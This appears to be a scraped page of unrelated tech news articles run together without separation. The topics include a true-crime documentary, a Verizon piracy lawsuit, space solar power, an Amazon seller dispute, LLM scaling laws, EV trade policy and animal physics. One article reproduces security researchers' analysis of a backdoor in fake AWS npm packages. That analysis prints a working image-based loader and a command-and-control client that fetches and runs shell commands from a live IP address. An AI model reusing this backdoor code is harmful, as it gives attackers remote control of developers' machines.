Author name: Mike M.

Meet the woman whose research helped the FBI catch notorious serial killers

Dr. Ann Burgess helps the FBI catch serial killers in Hulu’s Mastermind: To Think Like a Killer.

YouTube/Hulu

Fans of the Netflix series Mindhunter might recall the character of Dr. Wendy Carr (Anna Torv), a psychologist who joins forces with FBI criminal profilers to study the unique psychology of serial killers in hopes of more effectively catching them. But they might not know about the inspiration for the character: Dr. Ann Wolbert Burgess, whose long, distinguished career finally gets the attention it deserves in a new documentary from Hulu, Mastermind: To Think Like a Killer.

Burgess herself thought it was “fun” to see a fictional character based on her but noted that Hollywood did take some liberties. “They got it wrong,” she told Ars. “They made me a psychologist. I’m a nurse”—specifically, a forensic and psychiatric nurse who pioneered research on sex crimes, victimology, and criminal psychology.

Mastermind should go a long way toward setting things right. Hulu brought on Abby Fuller, best known for her work on Netflix’s Chef’s Table series, to direct. Fuller might seem like a surprising choice for a true crime documentary, but the streamer thought she would bring a fresh take to a well-worn genre. “I love the true crime aspects, but I thought we could do something more elevated and cinematic and really make this a character-driven piece about [Ann], with true crime elements,” Fuller told Ars.

There’s no doubt that the public has a rather morbid fascination with serial killers, and Burgess certainly has had concerns about the way media coverage and Hollywood films have turned murderers into celebrities. “Despite how obviously horrible these killers were, despite their utter brutality and the pain they inflicted upon their victims, they’d somehow become romanticized,” Burgess wrote in her memoir, A Killer by Design: Murderers, Mindhunters, and My Quest to Decipher the Criminal Mind. “All the inconvenient details that interfered with this narrative—the loss of life, issues of mental health, and the victims themselves—were simply ignored.”

A re-creation of Dr. Ann Burgess listening to taped interviews of serial killers in Mastermind.

YouTube/Hulu

That said, it’s not like anyone who finds the twisted psychology of serial killers, or true crime in general, fascinating is a sociopath or murderer in the making. “I think we all grapple with light and dark and how we see it in the world,” said Fuller. “There’s an inherent fascination with what makes someone who they are, with human behavior. And if you’re interested in human behavior, a serial killer exhibits some of the more fascinating behavior that exists. Trying to grasp the darkest of the dark and understand it is a way to ensure we never become it.”

“I think it’s a human factor,” Burgess said. “I don’t see anything wrong with it. There is a fascination to try to understand why people commit these horrifying crimes. How can people do these things? But I also think people like to play detective a little bit. I think that’s normal. You don’t want to be fooled; you don’t want to become a victim. So what can you learn to avoid it?”

For Burgess, it has always been about the victims. She co-founded one of the first crisis counseling programs at Boston City Hospital in the 1970s with Boston College sociologist Lynda Lytle Holmstrom. The duo conducted research on the emotional and traumatic effects of sexual violence, interviewing nearly 150 rape victims in the process. They were the first to realize that rape was about power and control rather than sex, and coined the term “rape trauma syndrome” to describe the psychological after-effects.

(WARNING: Some graphic details about violent crimes below.)

Dr. Ann Burgess’s research helped legitimize the FBI’s Behavioral Sciences Unit.

Hulu

Their work caught the attention of Roy Hazelwood of the FBI, who invited Burgess to the FBI Academy in Quantico, Virginia, to give lectures to agents in the fledgling Behavioral Sciences Unit (BSU) on victimology and violent sex crimes. Thus began a decades-long collaboration that established criminal profiling as a legitimate practice in law enforcement.

Record labels sue Verizon for not disconnecting pirates’ Internet service

Music piracy —

Lawsuit: One user’s IP address was identified in 4,450 infringement notices.

A Verizon service truck with a FiOS logo printed on the side.

Getty Images | Smith Collection/Gado

Major record labels sued Verizon on Friday, alleging that the Internet service provider violated copyright law by continuing to serve customers accused of pirating music. Verizon “knowingly provides its high-speed service to a massive community of online pirates,” said the complaint filed in US District Court for the Southern District of New York.

Universal, Sony, and Warner say they have sent over 340,000 copyright infringement notices to Verizon since early 2020. “Those notices identify specific subscribers on Verizon’s network stealing Plaintiffs’ sound recordings through peer-to-peer (‘P2P’) file-sharing networks that are notorious hotbeds for copyright infringement,” the lawsuit said.

Record labels allege that “Verizon ignored Plaintiffs’ notices and buried its head in the sand” by “continu[ing] to provide its high-speed service to thousands of known repeat infringers so it could continue to collect millions of dollars from them.” They say that “Verizon has knowingly contributed to, and reaped substantial profits from, massive copyright infringement committed by tens of thousands of its subscribers.”

The firms allege that Verizon is liable for contributory and vicarious copyright infringement and should have to pay damages of up to $150,000 for each work infringed. Plaintiffs filed what they call a “non-exhaustive” list of infringed works that includes 17,335 titles. That would imply requested damages of over $2.6 billion.
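
To spell out the arithmetic behind that figure (our back-of-the-envelope math, not a number taken from the complaint itself):

$$17{,}335 \text{ works} \times \$150{,}000 \text{ per work} = \$2{,}600{,}250{,}000 \approx \$2.6 \text{ billion}$$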

Numerous lawsuits against ISPs

Record labels and movie studios have filed numerous copyright lawsuits against Internet providers. Perhaps the most significant ongoing case involves Cox Communications, which has been fighting a $1 billion jury verdict since 2019.

Cox received support from groups such as the Electronic Frontier Foundation, which warned that the big money judgment could cause broadband providers to disconnect people from the Internet based only on accusations of copyright infringement. The US Court of Appeals for the 4th Circuit overturned the $1 billion verdict in February 2024, rejecting Sony’s claim that Cox profited directly from copyright infringement committed by users of Cox’s cable broadband network.

While judges in the Cox case reversed a vicarious liability verdict, they affirmed the jury’s additional finding of willful contributory infringement and ordered a new damages trial.

Cox recently said it is seeking a Supreme Court review on the questions of “whether an Internet service provider materially contributes to copyright infringement by declining to disconnect an Internet account knowing someone is likely to use it to infringe,” and “whether a secondary infringer can be adjudged willful based merely on knowledge of another’s direct infringement.” There is a circuit split on both questions, Cox said.

4,450 notices about one IP address

In the Verizon case, record labels claim that thousands of Verizon subscribers “were the subject of 20 or more notices from Plaintiffs, and more than 500 subscribers were the subject of 100 or more notices. One particularly egregious Verizon subscriber was single-handedly the subject of 4,450 infringement notices from Plaintiffs alone.”

That Verizon subscriber’s IP address was identified in 4,450 infringement notices between March 2021 and August 2023, the lawsuit said. Two other subscribers were allegedly the subject of 2,703 and 2,068 infringement notices, respectively.

“Verizon acknowledged that it received these notices of infringement sent by Plaintiffs’ representatives,” the lawsuit said. “Yet rather than taking any steps to address its customers’ illegal use of its network, Verizon deliberately chose to ignore Plaintiffs’ notices, willfully blinding itself to that information and prioritizing its own profits over its legal obligations.”

The plaintiffs claim that “Verizon has gone out of its way not to take action against subscribers engaging in repeated copyright infringement,” and “failed to terminate or otherwise take any meaningful action against the accounts of repeat infringers of which it was aware.”

“It is well-established law that if a party materially assists someone it knows is engaging in copyright infringement, that party is fully liable for the infringement as if it had infringed directly,” the lawsuit said.

Complaint system too onerous, suit claims

The lawsuit also complains that Verizon hasn’t made it easier for copyright owners to file complaints about Internet users:

Through one channel, Verizon claims to allow copyright holders to send P2P notices through a so-called “Anti-Piracy Cooperation Program,” but it has attached such onerous conditions to participation that the program is rendered a nullity. Not only has Verizon required participants to pay burdensome fees for simple, automated processes like Internet Protocol (“IP”) address lookups and notice forwarding, but participants have been required to waive their copyright claims, broadly indemnify Verizon, and, tellingly, keep the terms of the program confidential. Verizon has also limited the number of notices it will forward pursuant to the program.

The lawsuit said Verizon also allows copyright owners to send email notices of infringement instead of using the channel described above. The email method apparently doesn’t require copyright owners to waive their copyright claims or make payments, but the lawsuit alleges that “Verizon does not forward these notices to subscribers or track the number of email notices sent regarding repeat infringing subscribers. Verizon also arbitrarily caps the number of notices permitted per copyright holder at this address—ironic, to say the least, given that Verizon ignored hundreds of thousands of Plaintiffs’ notices to this email inbox.”

We contacted Verizon about the lawsuit and will update this article if it provides a response.

Here’s how carefully concealed backdoor in fake AWS files escaped mainstream notice

DEVS IN THE CROSSHAIRS —

Files available on the open source NPM repository underscore a growing sophistication.

A cartoon door leads to a wall of computer code.

Researchers have determined that two fake AWS packages downloaded hundreds of times from the open source NPM JavaScript repository contained carefully concealed code that backdoored developers’ computers when executed.

The packages—img-aws-s3-object-multipart-copy and legacyaws-s3-object-multipart-copy—were attempts to appear as aws-s3-object-multipart-copy, a legitimate JavaScript library for copying files using Amazon’s S3 cloud service. The fake files included all the code found in the legitimate library but added an additional JavaScript file named loadformat.js, along with three JPG images that were processed during package installation. The added file contained what appeared to be benign image analysis code, and one of the images contained code fragments that, when reconstructed, formed the code for backdooring the developer device.

Growing sophistication

“We have reported these packages for removal, however the malicious packages remained available on npm for nearly two days,” researchers from Phylum, the security firm that spotted the packages, wrote. “This is worrying as it implies that most systems are unable to detect and promptly report on these packages, leaving developers vulnerable to attack for longer periods of time.”

In an email, Phylum Head of Research Ross Bryant said img-aws-s3-object-multipart-copy received 134 downloads before it was taken down. The other file, legacyaws-s3-object-multipart-copy, got 48.

The care the package developers put into the code and the effectiveness of their tactics underscore the growing sophistication of attacks targeting open source repositories, which besides NPM have included PyPI, GitHub, and RubyGems. The advances made it possible for the vast majority of malware-scanning products to miss the backdoor sneaked into these two packages. In the past 17 months, threat actors backed by the North Korean government have targeted developers twice, in one case using a zero-day vulnerability.

Phylum researchers provided a deep-dive analysis of how the concealment worked:

Analyzing the loadformat.js file, we find what appears to be some fairly innocuous image analysis code.

However, upon closer review, we see that this code is doing a few interesting things, resulting in execution on the victim machine.

After reading the image file from the disk, each byte is analyzed. Any bytes with a value between 32 and 126 are converted from Unicode values into a character and appended to the analyzepixels variable.

function processImage(filePath) {
    console.log("Processing image...");
    const data = fs.readFileSync(filePath);
    let analyzepixels = "";
    let convertertree = false;

    for (let i = 0; i < data.length; i++) {
        const value = data[i];
        if (value >= 32 && value <= 126) {
            analyzepixels += String.fromCharCode(value);
        } else {
            if (analyzepixels.length > 2000) {
                convertertree = true;
                break;
            }
            analyzepixels = "";
        }
    }
    // ...

The threat actor then defines two distinct function bodies and stores each in its own variable, imagebyte and analyzePixels.

let analyzePixels = `
    if (false) {
        exec("node -v", (error, stdout, stderr) => {
            console.log(stdout);
        });
    }
    console.log("check nodejs version...");
`;

let imagebyte = `
    const httpsOptions = {
        hostname: 'cloudconvert.com',
        path: '/image-converter',
        method: 'POST'
    };
    const req = https.request(httpsOptions, res => {
        console.log('Status Code:', res.statusCode);
    });
    req.on('error', error => {
        console.error(error);
    });
    req.end();
    console.log("Executing operation...");
`;

If convertertree is set to true, imagebyte is set to analyzepixels. In plain language, if convertertree is set, it will execute whatever is contained in the script we extracted from the image file.

if (convertertree) {
    console.log("Optimization complete. Applying advanced features...");
    imagebyte = analyzepixels;
} else {
    console.log("Optimization complete. No advanced features applied.");
}

Looking back above, we note that convertertree will be set to true if the length of the bytes found in the image is greater than 2,000.

if (analyzepixels.length > 2000) {
    convertertree = true;
    break;
}

The author then creates a new function using either code that sends an empty POST request to cloudconvert.com or initiates executing whatever was extracted from the image files.

const func = new Function('https', 'exec', 'os', imagebyte);
func(https, exec, os);

The lingering question is, what is contained in the images that this is trying to execute?

Command-and-Control in a JPEG

Looking at the bottom of the loadformat.js file, we see the following:

processImage('logo1.jpg');
processImage('logo2.jpg');
processImage('logo3.jpg');

We find these three files in the package’s root, which are included below without modification, unless otherwise noted.

Appears as logo1.jpg in the package
Appears as logo2.jpg in the package
Appears as logo3.jpg in the package. Modified here as the file is corrupted and in some cases would not display properly.

If we run each of these through the processImage(...) function from above, we find that the Intel image (i.e., logo1.jpg) does not contain enough “valid” bytes to set the convertertree variable to true. The same goes for logo3.jpg, the AMD logo. However, for the Microsoft logo (logo2.jpg), we find the following, formatted for readability:

let fetchInterval = 0x1388;
let intervalId = setInterval(fetchAndExecuteCommand, fetchInterval);

const clientInfo = {
    'name': os.hostname(),
    'os': os.type() + " " + os.release()
};

const agent = new https.Agent({
    'rejectUnauthorized': false
});

function registerClient() {
    const _0x47c6de = JSON.stringify(clientInfo);
    const _0x5a10c1 = {
        'hostname': "85.208.108.29",
        'port': 0x1bb,
        'path': "/register",
        'method': "POST",
        'headers': {
            'Content-Type': "application/json",
            'Content-Length': Buffer.byteLength(_0x47c6de)
        },
        'agent': agent
    };
    const _0x38f695 = https.request(_0x5a10c1, _0x454719 => {
        console.log("Registered with server as " + clientInfo.name);
    });
    _0x38f695.on("error", _0x1159ec => {
        console.error("Problem with registration: " + _0x1159ec.message);
    });
    _0x38f695.write(_0x47c6de);
    _0x38f695.end();
}

function fetchAndExecuteCommand() {
    const _0x2dae30 = {
        'hostname': "85.208.108.29",
        'port': 0x1bb,
        'path': "/get-command?clientId=" + encodeURIComponent(clientInfo.name),
        'method': "GET",
        'agent': agent
    };
    https.get(_0x2dae30, _0x4a0c09 => {
        let _0x41cd12 = '';
        _0x4a0c09.on("data", _0x5cbbc5 => {
            _0x41cd12 += _0x5cbbc5.toString();
        });
        _0x4a0c09.on("end", () => {
            console.log("Received command:", _0x41cd12);
            if (_0x41cd12.startsWith('setInterval:')) {
                const _0x1e3896 = parseInt(_0x41cd12.split(':')[0x1], 0xa);
                if (!isNaN(_0x1e3896) && _0x1e3896 > 0x0) {
                    clearInterval(intervalId);
                    fetchInterval = _0x1e3896 * 0x3e8;
                    intervalId = setInterval(fetchAndExecuteCommand, fetchInterval);
                    console.log("Interval has been updated to " + _0x1e3896 + " seconds.");
                } else {
                    console.log("Invalid interval command received.");
                }
            } else {
                if (_0x41cd12.startsWith("cd ")) {
                    const _0x58bd7d = _0x41cd12.substring(0x3).trim();
                    try {
                        process.chdir(_0x58bd7d);
                        console.log("Changed directory to " + process.cwd());
                    } catch (_0x2ee272) {
                        console.error("Change directory failed: " + _0x2ee272);
                    }
                } else if (_0x41cd12 !== "No commands") {
                    exec(_0x41cd12, {
                        'cwd': process.cwd()
                    }, (_0x5da676, _0x1ae10c, _0x46788b) => {
                        let _0x4a96cd = _0x1ae10c;
                        if (_0x5da676) {
                            console.error("exec error: " + _0x5da676);
                            _0x4a96cd += "\nError: " + _0x46788b;
                        }
                        postResult(_0x4a96cd);
                    });
                } else {
                    console.log("No commands to execute");
                }
            }
        });
    }).on("error", _0x2e8190 => {
        console.error("Got error: " + _0x2e8190.message);
    });
}

function postResult(_0x1d73c1) {
    const _0xc05626 = {
        'hostname': "85.208.108.29",
        'port': 0x1bb,
        'path': "/post-result?clientId=" + encodeURIComponent(clientInfo.name),
        'method': "POST",
        'headers': {
            'Content-Type': "text/plain",
            'Content-Length': Buffer.byteLength(_0x1d73c1)
        },
        'agent': agent
    };
    const _0x2fcb05 = https.request(_0xc05626, _0x448ba6 => {
        console.log("Result sent to the server");
    });
    _0x2fcb05.on('error', _0x1f60a7 => {
        console.error("Problem with request: " + _0x1f60a7.message);
    });
    _0x2fcb05.write(_0x1d73c1);
    _0x2fcb05.end();
}

registerClient();

This code first registers the new client with the remote C2 by sending the following clientInfo to 85.208.108.29.

const clientInfo = {
    'name': os.hostname(),
    'os': os.type() + " " + os.release()
};

It then sets up an interval that periodically fetches commands from the attacker every 5 seconds (0x1388 is 5,000 in decimal, i.e., 5,000 milliseconds).

let fetchInterval = 0x1388;
let intervalId = setInterval(fetchAndExecuteCommand, fetchInterval);

Received commands are executed on the device, and the output is sent back to the attacker on the endpoint /post-result?clientId=.

One of the most innovative methods in recent memory for concealing an open source backdoor was discovered in March, just weeks before it was to be included in a production release of XZ Utils, a data-compression utility available on almost all installations of Linux. The backdoor was implemented through a five-stage loader that used a series of simple but clever techniques to hide itself. Once installed, the backdoor allowed the threat actors to log in to infected systems with administrative system rights.

The person or group responsible spent years working on the backdoor. Besides the sophistication of the concealment method, the entity devoted large amounts of time to producing high-quality code for open source projects in a successful effort to build trust with other developers.

In May, Phylum disrupted a separate campaign that backdoored a package available in PyPI that also used steganography, a technique that embeds secret code into images.

“In the last few years, we’ve seen a dramatic rise in the sophistication and volume of malicious packages published to open source ecosystems,” Phylum researchers wrote. “Make no mistake, these attacks are successful. It is absolutely imperative that developers and security organizations alike are keenly aware of this fact and are deeply vigilant with regard to open source libraries they consume.”

Will space-based solar power ever make sense?

Artist's depiction of an astronaut servicing solar panels against the black background of space.

Is space-based solar power a costly, risky pipe dream? Or is it a viable way to combat climate change? Although beaming solar power from space to Earth could ultimately involve transmitting gigawatts, the process could be made surprisingly safe and cost-effective, according to experts from Space Solar, the European Space Agency, and the University of Glasgow.

But we’re going to need to move well beyond demonstration hardware and solve a number of engineering challenges if we want to develop that potential.

Designing space-based solar

Beaming solar energy from space is not new; telecommunications satellites have been sending microwave signals generated by solar power back to Earth since the 1960s. But sending useful amounts of power is a different matter entirely.

“The idea [has] been around for just over a century,” said Nicol Caplin, deep space exploration scientist at the ESA, on a Physics World podcast. “The original concepts were indeed sci-fi. It’s sort of rooted in science fiction, but then, since then, there’s been a trend of interest coming and going.”

Researchers are scoping out multiple designs for space-based solar power. Matteo Ceriotti, senior lecturer in space systems engineering at the University of Glasgow, wrote in The Conversation that many designs have been proposed.

The Solaris initiative is exploring two possible technologies, according to Sanjay Vijendran, lead for the Solaris initiative at the ESA: one that involves beaming microwaves from a station in geostationary orbit down to a receiver on Earth and another that involves using immense mirrors in a lower orbit to reflect sunlight down onto solar farms. He considers both approaches potentially valuable, though microwave technology has drawn wider interest and was the main focus of these interviews; high-frequency radio waves could also be used for transmission.

“You really have a source of 24/7 clean power from space,” Vijendran said. The power can be transmitted regardless of weather conditions because of the frequency of the microwaves.

“A 1-gigawatt power plant in space would be comparable to the top five solar farms on earth. A power plant with a capacity of 1 gigawatt could power around 875,000 households for one year,” said Andrew Glester, host of the Physics World podcast.
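
That households figure roughly checks out (our arithmetic, not the podcast’s, assuming continuous output and a typical US household consumption of about 10,000 kWh per year):

$$1\ \text{GW} \times 8{,}760\ \text{h/yr} = 8.76\ \text{TWh/yr}, \qquad \frac{8.76 \times 10^{9}\ \text{kWh}}{875{,}000\ \text{households}} \approx 10{,}000\ \text{kWh per household per year}$$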

But we’re not ready to deploy anything like this. “It will be a big engineering challenge,” Caplin said. There are a number of physical hurdles involved in successfully building a solar power station in space.

Using microwave technology, the solar array for an orbiting power station that generates a gigawatt of power would have to be over 1 square kilometer in size, according to a Nature article by senior reporter Elizabeth Gibney. “That’s more than 100 times the size of the International Space Station, which took a decade to build.” It would also need to be assembled robotically, since the orbiting facility would be uncrewed.

The solar cells would need to be resilient to space radiation and debris. They would also need to be efficient and lightweight, with a power-to-weight ratio 50 times that of a typical silicon solar cell, Gibney wrote. Keeping the cost of these cells down is another factor that engineers have to take into consideration. Reducing the losses during power transmission is another challenge, Gibney wrote: the energy conversion rate needs to be improved to 10–15 percent, according to the ESA, which would require technical advances.

Space Solar is working on a satellite design called CASSIOPeiA, which Physics World describes as looking “like a spiral staircase, with the photovoltaic panels being the ‘treads’ and the microwave transmitters—rod-shaped dipoles—being the ‘risers.’” It has a helical shape with no moving parts.

“Our system’s comprised of hundreds of thousands of the same dinner-plate-sized power modules. Each module has the PV which converts the sun’s energy into DC electricity,” said Sam Adlen, CEO of Space Solar.

“That DC power then drives electronics to transmit the power… down toward Earth from dipole antennas. That power up in space is converted to [microwaves] and beamed down in a coherent beam down to the Earth where it’s received by a rectifying antenna, reconverted into electricity, and input to the grid.”

Adlen said that robotics technologies for space applications, such as in-orbit assembly, are advancing rapidly.

Ceriotti wrote that SPS-ALPHA, another design, has a large solar-collector structure that includes many heliostats, which are modular small reflectors that can be moved individually. These concentrate sunlight onto separate power-generating modules, after which it’s transmitted back to Earth by yet another module.

Dirty diaper resold on Amazon ruined a family business, report says

A feces-encrusted swim diaper tanked a family business after Amazon resold it as new, Bloomberg reported, triggering a bad review that quickly turned a million-dollar mom-and-pop shop into a $600,000 pile of debt.

Paul and Rachelle Baron, owners of Beau & Belle Littles, told Bloomberg that Amazon is supposed to inspect returned items before reselling them. But the company failed to detect the poop stains before reselling the damaged item, triggering a one-star review in 2020 that the couple says doomed their business after more than 100 buyers flagged it as “helpful.”

“The diaper arrived used and was covered in poop stains,” the review said, urging readers to “see pics.”

Because others marked the review as helpful, Amazon increased its visibility on the product page, just as the Barons “were executing a plan to triple their annual sales to $3 million in 2020.” No matter how many 5-star reviews were left, this one bad review blaming the seller for the issue continued to “haunt” the family business, the Barons said.

“Nothing could have been more disgusting!!” the review continued. “I am assuming someone returned it after using it and the company simply did not check the item and then shipped it to us as if it was brand new.”

Amazon says that it prohibits negative reviews that violate community guidelines, including by focusing on seller, order, or shipping feedback rather than on the item’s quality. Other one-star reviews for the same product, which the Barons seemingly accept as valid, comment on quality, with feedback like the diaper fitting too tightly or leaking. But the bad review, focused on the dirty item being resold as new, likely should have been removed, Bloomberg reported, since it “suggests the item had already been used.” The review also seemingly violated community guidelines by focusing on “the company” not checking the item before shipping, blaming the seller for Amazon’s return inspection process.

But Amazon ultimately declined to remove the bad review, Paul Baron told Bloomberg. The buyer who left the review, a teacher named Erin Elizabeth Herbert, told Bloomberg that the Barons had reached out directly to explain what happened, but she forgot to update the review and still has not as of this writing.

“I always meant to go back and revise my review to reflect that, and life got busy and I never did,” Herbert told Bloomberg.

Her review remains online, serving as a warning for parents to avoid buying from the family business.

“These were not small stains either,” Herbert’s review said. “I was extremely grossed out. Thank god I saw the stains and didn’t put it on my baby! I will be returning this ASAP, and I sure hope they check it out when they get it back, but I wouldn’t be surprised if they just ship it to some other unsuspecting parent.”

The Barons told Ars they think the buyer hasn’t updated the review because she doesn’t understand how damaging it has been to their business.

Ars could not immediately reach Amazon for comment, but a spokesperson, Maria Boschetti, seemed to suggest to Bloomberg that there was little the Barons could do to correct the issue now.

“We are sorry to hear that a seller feels their return was not evaluated correctly and resulted in a negative review,” Boschetti told Bloomberg. “We encourage selling partners to reach out with any concerns, and we listen to their feedback to help us continue improving the selling experience.”

On Amazon’s site, other sellers have complained about the company’s failure to remove reviews that clearly violate community guidelines. In one case, an Amazon support specialist named Danika acknowledged that the use of profanity in a review, for example, “seems particularly cut and dry as a violation,” promising to escalate the complaint. However, Danika appeared to abandon the thread after that, with the user commenting that the review remained up after the escalation.

The Barons are now selling enough inventory through Beau & Belle Littles to pay down their debt, but they are struggling to make a living a decade after launching what became a prominent Amazon success story. The couple told Bloomberg that a “loan secured by their home” has complicated “the prospect of filing for bankruptcy,” and both have taken on other jobs to make ends meet since the review was posted.

The Barons told Ars they’ve given up on resolving the issue with Amazon after a support specialist appeared demoralized, admitting that “it’s completely” Amazon’s “fault” but there was nothing he could do.

“The last four years have been an emotional train wreck,” Paul Baron told Bloomberg. “Shoppers might think returning a poopy diaper to Amazon is a victimless way to get their money back, but we’re a small, family business, and this is how we pay our mortgage.”

Microsoft CTO Kevin Scott thinks LLM “scaling laws” will hold despite criticism

As the word turns —

Will LLMs keep improving if we throw more compute at them? OpenAI dealmaker thinks so.

Kevin Scott, CTO and EVP of AI at Microsoft, speaks onstage during Vox Media’s 2023 Code Conference at The Ritz-Carlton, Laguna Niguel on September 27, 2023, in Dana Point, California.

During an interview with Sequoia Capital’s Training Data podcast published last Tuesday, Microsoft CTO Kevin Scott doubled down on his belief that so-called large language model (LLM) “scaling laws” will continue to drive AI progress, despite some skepticism in the field that progress has leveled out. Scott played a key role in forging a $13 billion technology-sharing deal between Microsoft and OpenAI.

“Despite what other people think, we’re not at diminishing marginal returns on scale-up,” Scott said. “And I try to help people understand there is an exponential here, and the unfortunate thing is you only get to sample it every couple of years because it just takes a while to build supercomputers and then train models on top of them.”

LLM scaling laws refer to patterns explored by OpenAI researchers in 2020 showing that the performance of language models tends to improve predictably as the models get larger (more parameters), are trained on more data, and have access to more computational power (compute). The laws suggest that simply scaling up model size and training data can lead to significant improvements in AI capabilities without necessarily requiring fundamental algorithmic breakthroughs.
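
For reference, the 2020 paper (Kaplan et al., “Scaling Laws for Neural Language Models”) expressed those patterns as power laws; a rough sketch of the form the researchers reported, where L is test loss, N is parameter count, and D is dataset size in tokens, with N_c and D_c as fitted constants:

$$L(N) \approx \left(\frac{N_c}{N}\right)^{\alpha_N}, \qquad L(D) \approx \left(\frac{D_c}{D}\right)^{\alpha_D}$$

The fitted exponents were small (on the order of $\alpha_N \approx 0.076$ and $\alpha_D \approx 0.095$), which is why the curves look so smooth: loss keeps falling as scale grows, but each successive improvement requires a large multiple of additional parameters, data, and compute.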

Since then, other researchers have challenged the idea of persisting scaling laws over time, but the concept is still a cornerstone of OpenAI’s AI development philosophy.

You can see Scott’s comments in the video below, beginning around 46:05:

Microsoft CTO Kevin Scott on how far scaling laws will extend

Scott’s optimism contrasts with a narrative among some critics in the AI community that progress in LLMs has plateaued around GPT-4 class models. The perception has been fueled by largely informal observations—and some benchmark results—about recent models like Google’s Gemini 1.5 Pro, Anthropic’s Claude Opus, and even OpenAI’s GPT-4o, which some argue haven’t shown the dramatic leaps in capability seen in earlier generations, suggesting that LLM development may be approaching diminishing returns.

“We all know that GPT-3 was vastly better than GPT-2. And we all know that GPT-4 (released thirteen months ago) was vastly better than GPT-3,” wrote AI critic Gary Marcus in April. “But what has happened since?”

The perception of plateau

Scott’s stance suggests that tech giants like Microsoft still feel justified in investing heavily in larger AI models, betting on continued breakthroughs rather than hitting a capability plateau. Given Microsoft’s investment in OpenAI and strong marketing of its own Microsoft Copilot AI features, the company has a strong interest in maintaining the perception of continued progress, even if the tech stalls.

Frequent AI critic Ed Zitron recently wrote in a post on his blog that one defense of continued investment into generative AI is that “OpenAI has something we don’t know about. A big, sexy, secret technology that will eternally break the bones of every hater,” he wrote. “Yet, I have a counterpoint: no it doesn’t.”

Some perceptions of slowing progress in LLM capabilities and benchmarking may be due to the rapid onset of AI in the public eye when, in fact, LLMs have been developing for years prior. OpenAI continued to develop LLMs during a roughly three-year gap between the release of GPT-3 in 2020 and GPT-4 in 2023. Many people likely perceived a rapid jump in capability with GPT-4’s launch in 2023 because they had only become recently aware of GPT-3-class models with the launch of ChatGPT in late November 2022, which used GPT-3.5.

In the podcast interview, the Microsoft CTO pushed back against the idea that AI progress has stalled, but he acknowledged the challenge of infrequent data points in this field, as new models often take years to develop. Despite this, Scott expressed confidence that future iterations will show improvements, particularly in areas where current models struggle.

“The next sample is coming, and I can’t tell you when, and I can’t predict exactly how good it’s going to be, but it will almost certainly be better at the things that are brittle right now, where you’re like, oh my god, this is a little too expensive, or a little too fragile, for me to use,” Scott said in the interview. “All of that gets better. It’ll get cheaper, and things will become less fragile. And then more complicated things will become possible. That is the story of each generation of these models as we’ve scaled up.”

China tells WTO that US EV subsidies are unfair trade barriers

trade war continues —

China says it’s unfair that only EVs made in North America qualify for tax credits.

Chinese renminbi (RMB) and US dollars (USD)

Getty Images

The ongoing dispute between the United States and China over electric vehicles shows no sign of abating. Today, Reuters reports that China has asked the World Trade Organization to set up a special panel to determine if US EV subsidies are an unfair trade barrier.

The Inflation Reduction Act of 2022 has been the most significant climate legislation in US history, with hundreds of billions of dollars of funding for the clean energy transition. Among its many details, it revamped the federal tax credit for buying a new electric vehicle.

In the past, a credit of up to $7,500 was tied to a plug-in vehicle’s battery capacity. But it’s now tied to where the car and its batteries were assembled, as well as where the battery minerals come from. Final assembly of the vehicle must be in North America, for example, and ever-increasing amounts of the battery pack’s content and value must come from North America or a country with which the US has a free trade agreement.

Even more troubling for Chinese automakers is a rule from the US Treasury Department that prohibits tax subsidies for vehicles manufactured by companies linked to “foreign entities of concern,” a category that includes Russia, North Korea, Iran, and China.

The measures were included in tax credit rules after extensive lobbying from automakers and unions in the US and politicians from both sides of the aisle. Pressure from the automotive industry also succeeded in getting the Mexican government to promise not to subsidize new Chinese EV factories south of the US border.

In May, US President Joe Biden levied a new 100 percent tariff targeted at specific Chinese imports, including EVs. In Europe, similar fears over the impact of heavily subsidized Chinese EVs on domestic car production saw the EU raise new tariffs of up to 37.6 percent on Chinese-made EVs, despite objections from the German auto industry.

China’s action at the WTO actually predates the new US EV tariffs—it first went to the trade organization in March, arguing that the US tax credits hinder fair competition and break existing WTO agreements.

China’s commerce ministry told Reuters that protectionist EV subsidies from the US “undermine international cooperation on climate change.”

Animals use physics? Let us count the ways

kitten latches on to a pole with its two front paws

Isaac Newton would never have discovered the laws of motion had he studied only cats.

Suppose you hold a cat, stomach up, and drop it from a second-story window. If a cat is simply a mechanical system that obeys Newton’s rules of matter in motion, it should land on its back. (OK, there are some technicalities—like this should be done in a vacuum, but ignore that for now.) Instead, most cats usually avoid injury by twisting themselves on the way down to land on their feet.

Most people are not mystified by this trick—everybody has seen videos attesting to cats’ acrobatic prowess. But for more than a century, scientists have wondered about the physics of how cats do it. Clearly, the mathematical theorem analyzing the falling cat as a mechanical system fails for live cats, as Nobel laureate Frank Wilczek points out in a recent paper.

“This theorem is not relevant to real biological cats,” writes Wilczek, a theoretical physicist at MIT. They are not closed mechanical systems, and can “consume stored energy … empowering mechanical motion.”
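
The theorem Wilczek refers to rests on conservation of angular momentum. A closed body dropped with no initial spin has zero total angular momentum, and that must remain true all the way down; the cat reorients anyway by bending at the waist and counter-rotating its front and rear halves so that the two contributions cancel. In a simplified two-cylinder sketch, with I the moment of inertia and ω the angular velocity of each half:

$$L_{\text{total}} = I_{\text{front}}\,\omega_{\text{front}} + I_{\text{rear}}\,\omega_{\text{rear}} = 0$$

By tucking its front legs, the cat shrinks $I_{\text{front}}$, so the front half swings through a large angle while the rear rotates back only slightly; repeating the maneuver with the rear half nets a full flip with no external torque ever applied.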

Nevertheless, the laws of physics do apply to cats—as well as every other kind of animal, from insects to elephants. Biology does not avoid physics; it embraces it. From friction on microscopic scales to fluid dynamics in water and air, animals exploit physical laws to run or swim or fly. Every other aspect of animal behavior, from breathing to building shelters, depends in some way on the restrictions imposed, and opportunities permitted, by physics.

“Living organisms are … systems whose actions are constrained by physics across multiple length scales and timescales,” Jennifer Rieser and coauthors write in the current issue of the Annual Review of Condensed Matter Physics.

While the field of animal behavior physics is still in its infancy, substantial progress has been made in explaining individual behaviors, along with how those behaviors are shaped via interactions with other individuals and the environment. Apart from discovering more about how animals perform their diverse repertoire of skills, such research may also lead to new physics knowledge gained by scrutinizing animal abilities that scientists don’t yet understand.

Critters in motion

Physics applies to animals in action over a wide range of spatial scales. At the smallest end of the range, attractive forces between nearby atoms facilitate the ability of geckos and some insects to climb up walls or even walk on ceilings. On a slightly larger scale, textures and structures provide adhesion for other biological gymnastics. In bird feathers, for instance, tiny hooks and barbs act like Velcro, holding feathers in position to enhance lift when flying, Rieser and colleagues report.

